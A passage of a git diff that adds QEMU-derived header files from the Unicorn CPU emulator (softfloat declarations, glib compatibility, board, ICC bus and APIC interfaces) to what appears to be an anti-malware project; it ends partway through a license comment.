STATUS_PARAM); +float32 uint32_to_float32(uint32_t STATUS_PARAM); +float64 uint32_to_float64(uint32_t STATUS_PARAM); +floatx80 int32_to_floatx80(int32_t STATUS_PARAM); +float128 int32_to_float128(int32_t STATUS_PARAM); +float32 int64_to_float32(int64_t STATUS_PARAM); +float32 uint64_to_float32(uint64_t STATUS_PARAM); +float64 int64_to_float64(int64_t STATUS_PARAM); +float64 uint64_to_float64(uint64_t STATUS_PARAM); +floatx80 int64_to_floatx80(int64_t STATUS_PARAM); +float128 int64_to_float128(int64_t STATUS_PARAM); +float128 uint64_to_float128(uint64_t STATUS_PARAM); + +/* We provide the int16 versions for symmetry of API with float-to-int */ +static inline float32 int16_to_float32(int16_t v STATUS_PARAM) +{ + return int32_to_float32(v STATUS_VAR); +} + +static inline float32 uint16_to_float32(uint16_t v STATUS_PARAM) +{ + return uint32_to_float32(v STATUS_VAR); +} + +static inline float64 int16_to_float64(int16_t v STATUS_PARAM) +{ + return int32_to_float64(v STATUS_VAR); +} + +static inline float64 uint16_to_float64(uint16_t v STATUS_PARAM) +{ + return uint32_to_float64(v STATUS_VAR); +} + +/*---------------------------------------------------------------------------- +| Software half-precision conversion routines. +*----------------------------------------------------------------------------*/ +float16 float32_to_float16( float32, flag STATUS_PARAM ); +float32 float16_to_float32( float16, flag STATUS_PARAM ); +float16 float64_to_float16(float64 a, flag ieee STATUS_PARAM); +float64 float16_to_float64(float16 a, flag ieee STATUS_PARAM); + +/*---------------------------------------------------------------------------- +| Software half-precision operations. +*----------------------------------------------------------------------------*/ +int float16_is_quiet_nan( float16 ); +int float16_is_signaling_nan( float16 ); +float16 float16_maybe_silence_nan( float16 ); + +static inline int float16_is_any_nan(float16 a) +{ + return ((float16_val(a) & ~0x8000) > 0x7c00); +} + +/*---------------------------------------------------------------------------- +| The pattern for a default generated half-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float16 float16_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE single-precision conversion routines. +*----------------------------------------------------------------------------*/ +int_fast16_t float32_to_int16(float32 STATUS_PARAM); +uint_fast16_t float32_to_uint16(float32 STATUS_PARAM); +int_fast16_t float32_to_int16_round_to_zero(float32 STATUS_PARAM); +uint_fast16_t float32_to_uint16_round_to_zero(float32 STATUS_PARAM); +int32 float32_to_int32( float32 STATUS_PARAM ); +int32 float32_to_int32_round_to_zero( float32 STATUS_PARAM ); +uint32 float32_to_uint32( float32 STATUS_PARAM ); +uint32 float32_to_uint32_round_to_zero( float32 STATUS_PARAM ); +int64 float32_to_int64( float32 STATUS_PARAM ); +uint64 float32_to_uint64(float32 STATUS_PARAM); +uint64 float32_to_uint64_round_to_zero(float32 STATUS_PARAM); +int64 float32_to_int64_round_to_zero( float32 STATUS_PARAM ); +float64 float32_to_float64( float32 STATUS_PARAM ); +floatx80 float32_to_floatx80( float32 STATUS_PARAM ); +float128 float32_to_float128( float32 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE single-precision operations. +*----------------------------------------------------------------------------*/ +float32 float32_round_to_int( float32 STATUS_PARAM ); +float32 float32_add( float32, float32 STATUS_PARAM ); +float32 float32_sub( float32, float32 STATUS_PARAM ); +float32 float32_mul( float32, float32 STATUS_PARAM ); +float32 float32_div( float32, float32 STATUS_PARAM ); +float32 float32_rem( float32, float32 STATUS_PARAM ); +float32 float32_muladd(float32, float32, float32, int STATUS_PARAM); +float32 float32_sqrt( float32 STATUS_PARAM ); +float32 float32_exp2( float32 STATUS_PARAM ); +float32 float32_log2( float32 STATUS_PARAM ); +int float32_eq( float32, float32 STATUS_PARAM ); +int float32_le( float32, float32 STATUS_PARAM ); +int float32_lt( float32, float32 STATUS_PARAM ); +int float32_unordered( float32, float32 STATUS_PARAM ); +int float32_eq_quiet( float32, float32 STATUS_PARAM ); +int float32_le_quiet( float32, float32 STATUS_PARAM ); +int float32_lt_quiet( float32, float32 STATUS_PARAM ); +int float32_unordered_quiet( float32, float32 STATUS_PARAM ); +int float32_compare( float32, float32 STATUS_PARAM ); +int float32_compare_quiet( float32, float32 STATUS_PARAM ); +float32 float32_min(float32, float32 STATUS_PARAM); +float32 float32_max(float32, float32 STATUS_PARAM); +float32 float32_minnum(float32, float32 STATUS_PARAM); +float32 float32_maxnum(float32, float32 STATUS_PARAM); +float32 float32_minnummag(float32, float32 STATUS_PARAM); +float32 float32_maxnummag(float32, float32 STATUS_PARAM); +int float32_is_quiet_nan( float32 ); +int float32_is_signaling_nan( float32 ); +float32 float32_maybe_silence_nan( float32 ); +float32 float32_scalbn( float32, int STATUS_PARAM ); + +static inline float32 float32_abs(float32 a) +{ + /* Note that abs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. + */ + return make_float32(float32_val(a) & 0x7fffffff); +} + +static inline float32 float32_chs(float32 a) +{ + /* Note that chs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. + */ + return make_float32(float32_val(a) ^ 0x80000000); +} + +static inline int float32_is_infinity(float32 a) +{ + return (float32_val(a) & 0x7fffffff) == 0x7f800000; +} + +static inline int float32_is_neg(float32 a) +{ + return float32_val(a) >> 31; +} + +static inline int float32_is_zero(float32 a) +{ + return (float32_val(a) & 0x7fffffff) == 0; +} + +static inline int float32_is_any_nan(float32 a) +{ + return ((float32_val(a) & ~(1U << 31)) > 0x7f800000UL); +} + +static inline int float32_is_zero_or_denormal(float32 a) +{ + return (float32_val(a) & 0x7f800000) == 0; +} + +static inline float32 float32_set_sign(float32 a, int sign) +{ + return make_float32((float32_val(a) & 0x7fffffff) | (sign << 31)); +} + +#define float32_zero make_float32(0) +#define float32_one make_float32(0x3f800000) +#define float32_ln2 make_float32(0x3f317218) +#define float32_pi make_float32(0x40490fdb) +#define float32_half make_float32(0x3f000000) +#define float32_infinity make_float32(0x7f800000) + + +/*---------------------------------------------------------------------------- +| The pattern for a default generated single-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float32 float32_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE double-precision conversion routines. +*----------------------------------------------------------------------------*/ +int_fast16_t float64_to_int16(float64 STATUS_PARAM); +uint_fast16_t float64_to_uint16(float64 STATUS_PARAM); +int_fast16_t float64_to_int16_round_to_zero(float64 STATUS_PARAM); +uint_fast16_t float64_to_uint16_round_to_zero(float64 STATUS_PARAM); +int32 float64_to_int32( float64 STATUS_PARAM ); +int32 float64_to_int32_round_to_zero( float64 STATUS_PARAM ); +uint32 float64_to_uint32( float64 STATUS_PARAM ); +uint32 float64_to_uint32_round_to_zero( float64 STATUS_PARAM ); +int64 float64_to_int64( float64 STATUS_PARAM ); +int64 float64_to_int64_round_to_zero( float64 STATUS_PARAM ); +uint64 float64_to_uint64 (float64 a STATUS_PARAM); +uint64 float64_to_uint64_round_to_zero (float64 a STATUS_PARAM); +float32 float64_to_float32( float64 STATUS_PARAM ); +floatx80 float64_to_floatx80( float64 STATUS_PARAM ); +float128 float64_to_float128( float64 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE double-precision operations. +*----------------------------------------------------------------------------*/ +float64 float64_round_to_int( float64 STATUS_PARAM ); +float64 float64_trunc_to_int( float64 STATUS_PARAM ); +float64 float64_add( float64, float64 STATUS_PARAM ); +float64 float64_sub( float64, float64 STATUS_PARAM ); +float64 float64_mul( float64, float64 STATUS_PARAM ); +float64 float64_div( float64, float64 STATUS_PARAM ); +float64 float64_rem( float64, float64 STATUS_PARAM ); +float64 float64_muladd(float64, float64, float64, int STATUS_PARAM); +float64 float64_sqrt( float64 STATUS_PARAM ); +float64 float64_log2( float64 STATUS_PARAM ); +int float64_eq( float64, float64 STATUS_PARAM ); +int float64_le( float64, float64 STATUS_PARAM ); +int float64_lt( float64, float64 STATUS_PARAM ); +int float64_unordered( float64, float64 STATUS_PARAM ); +int float64_eq_quiet( float64, float64 STATUS_PARAM ); +int float64_le_quiet( float64, float64 STATUS_PARAM ); +int float64_lt_quiet( float64, float64 STATUS_PARAM ); +int float64_unordered_quiet( float64, float64 STATUS_PARAM ); +int float64_compare( float64, float64 STATUS_PARAM ); +int float64_compare_quiet( float64, float64 STATUS_PARAM ); +float64 float64_min(float64, float64 STATUS_PARAM); +float64 float64_max(float64, float64 STATUS_PARAM); +float64 float64_minnum(float64, float64 STATUS_PARAM); +float64 float64_maxnum(float64, float64 STATUS_PARAM); +float64 float64_minnummag(float64, float64 STATUS_PARAM); +float64 float64_maxnummag(float64, float64 STATUS_PARAM); +int float64_is_quiet_nan( float64 a ); +int float64_is_signaling_nan( float64 ); +float64 float64_maybe_silence_nan( float64 ); +float64 float64_scalbn( float64, int STATUS_PARAM ); + +static inline float64 float64_abs(float64 a) +{ + /* Note that abs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. + */ + return make_float64(float64_val(a) & 0x7fffffffffffffffLL); +} + +static inline float64 float64_chs(float64 a) +{ + /* Note that chs does *not* handle NaN specially, nor does + * it flush denormal inputs to zero. + */ + return make_float64(float64_val(a) ^ 0x8000000000000000LL); +} + +static inline int float64_is_infinity(float64 a) +{ + return (float64_val(a) & 0x7fffffffffffffffLL ) == 0x7ff0000000000000LL; +} + +static inline int float64_is_neg(float64 a) +{ + return float64_val(a) >> 63; +} + +static inline int float64_is_zero(float64 a) +{ + return (float64_val(a) & 0x7fffffffffffffffLL) == 0; +} + +static inline int float64_is_any_nan(float64 a) +{ + return ((float64_val(a) & ~(1ULL << 63)) > 0x7ff0000000000000ULL); +} + +static inline int float64_is_zero_or_denormal(float64 a) +{ + return (float64_val(a) & 0x7ff0000000000000LL) == 0; +} + +static inline float64 float64_set_sign(float64 a, int sign) +{ + return make_float64((float64_val(a) & 0x7fffffffffffffffULL) + | ((int64_t)sign << 63)); +} + +#define float64_zero make_float64(0) +#define float64_one make_float64(0x3ff0000000000000LL) +#define float64_ln2 make_float64(0x3fe62e42fefa39efLL) +#define float64_pi make_float64(0x400921fb54442d18LL) +#define float64_half make_float64(0x3fe0000000000000LL) +#define float64_infinity make_float64(0x7ff0000000000000LL) + +/*---------------------------------------------------------------------------- +| The pattern for a default generated double-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float64 float64_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE extended double-precision conversion routines. +*----------------------------------------------------------------------------*/ +int32 floatx80_to_int32( floatx80 STATUS_PARAM ); +int32 floatx80_to_int32_round_to_zero( floatx80 STATUS_PARAM ); +int64 floatx80_to_int64( floatx80 STATUS_PARAM ); +int64 floatx80_to_int64_round_to_zero( floatx80 STATUS_PARAM ); +float32 floatx80_to_float32( floatx80 STATUS_PARAM ); +float64 floatx80_to_float64( floatx80 STATUS_PARAM ); +float128 floatx80_to_float128( floatx80 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE extended double-precision operations. +*----------------------------------------------------------------------------*/ +floatx80 floatx80_round_to_int( floatx80 STATUS_PARAM ); +floatx80 floatx80_add( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_sub( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_mul( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_div( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_rem( floatx80, floatx80 STATUS_PARAM ); +floatx80 floatx80_sqrt( floatx80 STATUS_PARAM ); +int floatx80_eq( floatx80, floatx80 STATUS_PARAM ); +int floatx80_le( floatx80, floatx80 STATUS_PARAM ); +int floatx80_lt( floatx80, floatx80 STATUS_PARAM ); +int floatx80_unordered( floatx80, floatx80 STATUS_PARAM ); +int floatx80_eq_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_le_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_lt_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_unordered_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_compare( floatx80, floatx80 STATUS_PARAM ); +int floatx80_compare_quiet( floatx80, floatx80 STATUS_PARAM ); +int floatx80_is_quiet_nan( floatx80 ); +int floatx80_is_signaling_nan( floatx80 ); +floatx80 floatx80_maybe_silence_nan( floatx80 ); +floatx80 floatx80_scalbn( floatx80, int STATUS_PARAM ); + +static inline floatx80 floatx80_abs(floatx80 a) +{ + a.high &= 0x7fff; + return a; +} + +static inline floatx80 floatx80_chs(floatx80 a) +{ + a.high ^= 0x8000; + return a; +} + +static inline int floatx80_is_infinity(floatx80 a) +{ + return (a.high & 0x7fff) == 0x7fff && a.low == 0x8000000000000000LL; +} + +static inline int floatx80_is_neg(floatx80 a) +{ + return a.high >> 15; +} + +static inline int floatx80_is_zero(floatx80 a) +{ + return (a.high & 0x7fff) == 0 && a.low == 0; +} + +static inline int floatx80_is_zero_or_denormal(floatx80 a) +{ + return (a.high & 0x7fff) == 0; +} + +static inline int floatx80_is_any_nan(floatx80 a) +{ + return ((a.high & 0x7fff) == 0x7fff) && (a.low<<1); +} + +/*---------------------------------------------------------------------------- +| Return whether the given value is an invalid floatx80 encoding. +| Invalid floatx80 encodings arise when the integer bit is not set, but +| the exponent is not zero. The only times the integer bit is permitted to +| be zero is in subnormal numbers and the value zero. +| This includes what the Intel software developer's manual calls pseudo-NaNs, +| pseudo-infinities and un-normal numbers. It does not include +| pseudo-denormals, which must still be correctly handled as inputs even +| if they are never generated as outputs. +*----------------------------------------------------------------------------*/ +static inline bool floatx80_invalid_encoding(floatx80 a) +{ + return (a.low & ((uint64_t)1 << 63)) == 0 && (a.high & 0x7FFF) != 0; +} + +#define floatx80_zero make_floatx80(0x0000, 0x0000000000000000LL) +#define floatx80_one make_floatx80(0x3fff, 0x8000000000000000LL) +#define floatx80_ln2 make_floatx80(0x3ffe, 0xb17217f7d1cf79acLL) +#define floatx80_pi make_floatx80(0x4000, 0xc90fdaa22168c235LL) +#define floatx80_half make_floatx80(0x3ffe, 0x8000000000000000LL) +#define floatx80_infinity make_floatx80(0x7fff, 0x8000000000000000LL) + +/*---------------------------------------------------------------------------- +| The pattern for a default generated extended double-precision NaN. +*----------------------------------------------------------------------------*/ +extern const floatx80 floatx80_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE quadruple-precision conversion routines. +*----------------------------------------------------------------------------*/ +int32 float128_to_int32( float128 STATUS_PARAM ); +int32 float128_to_int32_round_to_zero( float128 STATUS_PARAM ); +int64 float128_to_int64( float128 STATUS_PARAM ); +int64 float128_to_int64_round_to_zero( float128 STATUS_PARAM ); +float32 float128_to_float32( float128 STATUS_PARAM ); +float64 float128_to_float64( float128 STATUS_PARAM ); +floatx80 float128_to_floatx80( float128 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE quadruple-precision operations. +*----------------------------------------------------------------------------*/ +float128 float128_round_to_int( float128 STATUS_PARAM ); +float128 float128_add( float128, float128 STATUS_PARAM ); +float128 float128_sub( float128, float128 STATUS_PARAM ); +float128 float128_mul( float128, float128 STATUS_PARAM ); +float128 float128_div( float128, float128 STATUS_PARAM ); +float128 float128_rem( float128, float128 STATUS_PARAM ); +float128 float128_sqrt( float128 STATUS_PARAM ); +int float128_eq( float128, float128 STATUS_PARAM ); +int float128_le( float128, float128 STATUS_PARAM ); +int float128_lt( float128, float128 STATUS_PARAM ); +int float128_unordered( float128, float128 STATUS_PARAM ); +int float128_eq_quiet( float128, float128 STATUS_PARAM ); +int float128_le_quiet( float128, float128 STATUS_PARAM ); +int float128_lt_quiet( float128, float128 STATUS_PARAM ); +int float128_unordered_quiet( float128, float128 STATUS_PARAM ); +int float128_compare( float128, float128 STATUS_PARAM ); +int float128_compare_quiet( float128, float128 STATUS_PARAM ); +int float128_is_quiet_nan( float128 ); +int float128_is_signaling_nan( float128 ); +float128 float128_maybe_silence_nan( float128 ); +float128 float128_scalbn( float128, int STATUS_PARAM ); + +static inline float128 float128_abs(float128 a) +{ + a.high &= 0x7fffffffffffffffLL; + return a; +} + +static inline float128 float128_chs(float128 a) +{ + a.high ^= 0x8000000000000000LL; + return a; +} + +static inline int float128_is_infinity(float128 a) +{ + return (a.high & 0x7fffffffffffffffLL) == 0x7fff000000000000LL && a.low == 0; +} + +static inline int float128_is_neg(float128 a) +{ + return a.high >> 63; +} + +static inline int float128_is_zero(float128 a) +{ + return (a.high & 0x7fffffffffffffffLL) == 0 && a.low == 0; +} + +static inline int float128_is_zero_or_denormal(float128 a) +{ + return (a.high & 0x7fff000000000000LL) == 0; +} + +static inline int float128_is_any_nan(float128 a) +{ + return ((a.high >> 48) & 0x7fff) == 0x7fff && + ((a.low != 0) || ((a.high & 0xffffffffffffLL) != 0)); +} + +#define float128_zero make_float128(0, 0) + +/*---------------------------------------------------------------------------- +| The pattern for a default generated quadruple-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float128 float128_default_nan; + +#endif /* !SOFTFLOAT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/glib_compat.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/glib_compat.h new file mode 100644 index 0000000..2d627ed --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/glib_compat.h @@ -0,0 +1,136 @@ +/* +glib_compat.h replacement functionality for glib code used in qemu +Copyright (C) 2016 Chris Eagle cseagle at gmail dot com + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. + +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +*/ + +#ifndef __GLIB_COMPAT_H +#define __GLIB_COMPAT_H + +#include "unicorn/platform.h" +#include <stdarg.h> +#include <stdlib.h> +#include <assert.h> + +#ifndef TRUE +#define TRUE 1 +#endif + +#ifndef FALSE +#define FALSE 0 +#endif + +#define g_assert(expr) assert(expr) +#define g_assert_not_reached() assert(0) + +/* typedefs for glib related types that may still be referenced */ +typedef void* gpointer; +typedef const void *gconstpointer; +typedef int gint; +typedef uint32_t guint32; +typedef uint64_t guint64; +typedef unsigned int guint; +typedef char gchar; +typedef int gboolean; +typedef unsigned long gulong; +typedef unsigned long gsize; + +typedef gint (*GCompareDataFunc)(gconstpointer a, + gconstpointer b, + gpointer user_data); +typedef void (*GFunc)(gpointer data, gpointer user_data); +typedef gint (*GCompareFunc)(gconstpointer v1, gconstpointer v2); +typedef void (*GDestroyNotify)(gpointer data); + +guint g_str_hash(gconstpointer v); +gboolean g_str_equal(gconstpointer v1, gconstpointer v2); +guint g_int_hash(gconstpointer v); + +gboolean g_int_equal(gconstpointer v1, gconstpointer v2); + +typedef struct _GList { + gpointer data; + struct _GList *next; + struct _GList *prev; +} GList; + +GList *g_list_first(GList *list); +void g_list_foreach(GList *list, GFunc func, gpointer user_data); +void g_list_free(GList *list); +GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare); +#define g_list_next(list) (list->next) +GList *g_list_prepend(GList *list, gpointer data); +GList *g_list_remove_link(GList *list, GList *llink); +GList *g_list_sort(GList *list, GCompareFunc compare); + +typedef struct _GSList { + gpointer data; + struct _GSList *next; +} GSList; + +GSList *g_slist_append(GSList *list, gpointer data); +void g_slist_foreach(GSList *list, GFunc func, gpointer user_data); +void g_slist_free(GSList *list); +GSList *g_slist_prepend(GSList *list, gpointer data); +GSList *g_slist_sort(GSList *list, GCompareFunc compare); + +typedef guint (*GHashFunc)(gconstpointer key); +typedef gboolean (*GEqualFunc)(gconstpointer a, gconstpointer b); +typedef void (*GHFunc)(gpointer key, gpointer value, gpointer user_data); +typedef gboolean (*GHRFunc)(gpointer key, gpointer value, gpointer user_data); + +typedef struct _GHashTable GHashTable; + +void g_hash_table_destroy(GHashTable *hash_table); +gpointer g_hash_table_find(GHashTable *hash_table, GHRFunc predicate, gpointer user_data); +void g_hash_table_foreach(GHashTable *hash_table, GHFunc func, gpointer user_data); +void g_hash_table_insert(GHashTable *hash_table, gpointer key, gpointer value); +gpointer g_hash_table_lookup(GHashTable *hash_table, gconstpointer key); +GHashTable *g_hash_table_new(GHashFunc hash_func, GEqualFunc key_equal_func); +GHashTable *g_hash_table_new_full(GHashFunc hash_func, GEqualFunc key_equal_func, + GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func); +void g_hash_table_remove_all(GHashTable *hash_table); +gboolean g_hash_table_remove(GHashTable *hash_table, gconstpointer key); +void g_hash_table_unref(GHashTable *hash_table); +GHashTable *g_hash_table_ref(GHashTable *hash_table); +guint g_hash_table_size(GHashTable *hash_table); + +/* replacement for g_malloc dependency */ +void g_free(gpointer ptr); +gpointer g_malloc(size_t size); +gpointer g_malloc0(size_t size); +gpointer g_try_malloc0(size_t size); +gpointer g_realloc(gpointer ptr, size_t size); +char *g_strdup(const char *str); +char *g_strdup_printf(const char *format, ...); +char *g_strdup_vprintf(const char *format, va_list ap); +char *g_strndup(const char *str, size_t n); +void g_strfreev(char **v); +gpointer g_memdup(gconstpointer mem, size_t byte_size); +gpointer g_new_(size_t sz, size_t n_structs); +gpointer g_new0_(size_t sz, size_t n_structs); +gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs); +gchar* g_strconcat (const gchar *string1, ...); +gchar** g_strsplit (const gchar *string, + const gchar *delimiter, + gint max_tokens); + + +#define g_new(struct_type, n_structs) ((struct_type*)g_new_(sizeof(struct_type), n_structs)) +#define g_new0(struct_type, n_structs) ((struct_type*)g_new0_(sizeof(struct_type), n_structs)) +#define g_renew(struct_type, mem, n_structs) ((struct_type*)g_renew_(sizeof(struct_type), mem, n_structs)) + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/boards.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/boards.h new file mode 100644 index 0000000..e0afde0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/boards.h @@ -0,0 +1,82 @@ +/* Declarations for use by board files for creating devices. */ + +#ifndef HW_BOARDS_H +#define HW_BOARDS_H + +#include "qemu/typedefs.h" +#include "sysemu/accel.h" +#include "hw/qdev.h" +#include "qom/object.h" +#include "uc_priv.h" + +typedef int QEMUMachineInitFunc(struct uc_struct *uc, MachineState *ms); + +typedef void QEMUMachineResetFunc(void); + +struct QEMUMachine { + const char *family; /* NULL iff @name identifies a standalone machtype */ + const char *name; + QEMUMachineInitFunc *init; + QEMUMachineResetFunc *reset; + int max_cpus; + int is_default; + int arch; +}; + +void memory_region_allocate_system_memory(MemoryRegion *mr, Object *owner, + const char *name, + uint64_t ram_size); + +void qemu_register_machine(struct uc_struct *uc, QEMUMachine *m, const char *type_machine, + void (*init)(struct uc_struct *uc, ObjectClass *oc, void *data)); + +#define TYPE_MACHINE_SUFFIX "-machine" +#define TYPE_MACHINE "machine" +#undef MACHINE /* BSD defines it and QEMU does not use it */ +#define MACHINE(uc, obj) \ + OBJECT_CHECK(uc, MachineState, (obj), TYPE_MACHINE) +#define MACHINE_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, MachineClass, (obj), TYPE_MACHINE) +#define MACHINE_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, MachineClass, (klass), TYPE_MACHINE) + +MachineClass *find_default_machine(struct uc_struct *uc, int arch); + +/** + * MachineClass: + * @qemu_machine: #QEMUMachine + */ +struct MachineClass { + /*< private >*/ + ObjectClass parent_class; + /*< public >*/ + + const char *family; /* NULL iff @name identifies a standalone machtype */ + const char *name; + + int (*init)(struct uc_struct *uc, MachineState *state); + void (*reset)(void); + + int max_cpus; + int is_default; + int arch; +}; + +/** + * MachineState: + */ +struct MachineState { + /*< private >*/ + Object parent_obj; + + /*< public >*/ + ram_addr_t ram_size; + ram_addr_t maxram_size; + const char *cpu_model; + struct uc_struct *uc; + AccelState *accelerator; +}; + +void machine_register_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/cpu/icc_bus.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/cpu/icc_bus.h new file mode 100644 index 0000000..cbb9c01 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/cpu/icc_bus.h @@ -0,0 +1,79 @@ +/* icc_bus.h + * emulate x86 ICC (Interrupt Controller Communications) bus + * + * Copyright (c) 2013 Red Hat, Inc + * + * Authors: + * Igor Mammedov <imammedo@redhat.com> + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#ifndef ICC_BUS_H +#define ICC_BUS_H + +#include "exec/memory.h" +#include "hw/qdev-core.h" + +#define TYPE_ICC_BUS "icc-bus" + +#ifndef CONFIG_USER_ONLY + +/** + * ICCBus: + * + * ICC bus + */ +typedef struct ICCBus { + /*< private >*/ + BusState parent_obj; + /*< public >*/ + + MemoryRegion *apic_address_space; +} ICCBus; + +#define ICC_BUS(uc, obj) OBJECT_CHECK(uc, ICCBus, (obj), TYPE_ICC_BUS) + +/** + * ICCDevice: + * + * ICC device + */ +typedef struct ICCDevice { + /*< private >*/ + DeviceState qdev; + /*< public >*/ +} ICCDevice; + +/** + * ICCDeviceClass: + * @init: Initialization callback for derived classes. + * + * ICC device class + */ +typedef struct ICCDeviceClass { + /*< private >*/ + DeviceClass parent_class; + /*< public >*/ + + DeviceRealize realize; +} ICCDeviceClass; + +#define TYPE_ICC_DEVICE "icc-device" +#define ICC_DEVICE_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, ICCDeviceClass, (klass), TYPE_ICC_DEVICE) + +void icc_bus_register_types(struct uc_struct *uc); + +#endif /* CONFIG_USER_ONLY */ +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/hw.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/hw.h new file mode 100644 index 0000000..54b25b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/hw.h @@ -0,0 +1,41 @@ +/* Declarations for use by hardware emulation. */ +#ifndef QEMU_HW_H +#define QEMU_HW_H + +#include "qemu-common.h" + +#if !defined(CONFIG_USER_ONLY) && !defined(NEED_CPU_H) +#include "exec/cpu-common.h" +#endif + +#include "exec/ioport.h" +#include "qemu/log.h" + +#ifdef NEED_CPU_H +#if TARGET_LONG_BITS == 64 +#define qemu_put_betl qemu_put_be64 +#define qemu_get_betl qemu_get_be64 +#define qemu_put_betls qemu_put_be64s +#define qemu_get_betls qemu_get_be64s +#define qemu_put_sbetl qemu_put_sbe64 +#define qemu_get_sbetl qemu_get_sbe64 +#define qemu_put_sbetls qemu_put_sbe64s +#define qemu_get_sbetls qemu_get_sbe64s +#else +#define qemu_put_betl qemu_put_be32 +#define qemu_get_betl qemu_get_be32 +#define qemu_put_betls qemu_put_be32s +#define qemu_get_betls qemu_get_be32s +#define qemu_put_sbetl qemu_put_sbe32 +#define qemu_get_sbetl qemu_get_sbe32 +#define qemu_put_sbetls qemu_put_sbe32s +#define qemu_get_sbetls qemu_get_sbe32s +#endif +#endif + +typedef void QEMUResetHandler(void *opaque); + +void qemu_register_reset(QEMUResetHandler *func, void *opaque); +void qemu_unregister_reset(QEMUResetHandler *func, void *opaque); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic.h new file mode 100644 index 0000000..42b90b9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic.h @@ -0,0 +1,29 @@ +#ifndef APIC_H +#define APIC_H + +#include "qemu-common.h" + +/* apic.c */ +int apic_accept_pic_intr(DeviceState *s); +int apic_get_interrupt(DeviceState *s); +void cpu_set_apic_base(struct uc_struct *uc, DeviceState *s, uint64_t val); +uint64_t cpu_get_apic_base(struct uc_struct *uc, DeviceState *s); +void cpu_set_apic_tpr(struct uc_struct *uc, DeviceState *s, uint8_t val); +uint8_t cpu_get_apic_tpr(struct uc_struct *uc, DeviceState *s); +void apic_init_reset(struct uc_struct *uc, DeviceState *s); +void apic_sipi(DeviceState *s); +void apic_handle_tpr_access_report(DeviceState *d, target_ulong ip, + TPRAccess access); +void apic_poll_irq(DeviceState *d); +void apic_designate_bsp(struct uc_struct *uc, DeviceState *d); + +/* pc.c */ +DeviceState *cpu_get_current_apic(struct uc_struct *uc); + +/* cpu.c */ +bool cpu_is_bsp(X86CPU *cpu); + +void apic_register_types(struct uc_struct *uc); +void apic_common_register_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic_internal.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic_internal.h new file mode 100644 index 0000000..b833d14 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic_internal.h @@ -0,0 +1,147 @@ +/* + * APIC support - internal interfaces + * + * Copyright (c) 2004-2005 Fabrice Bellard + * Copyright (c) 2011 Jan Kiszka, Siemens AG + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but 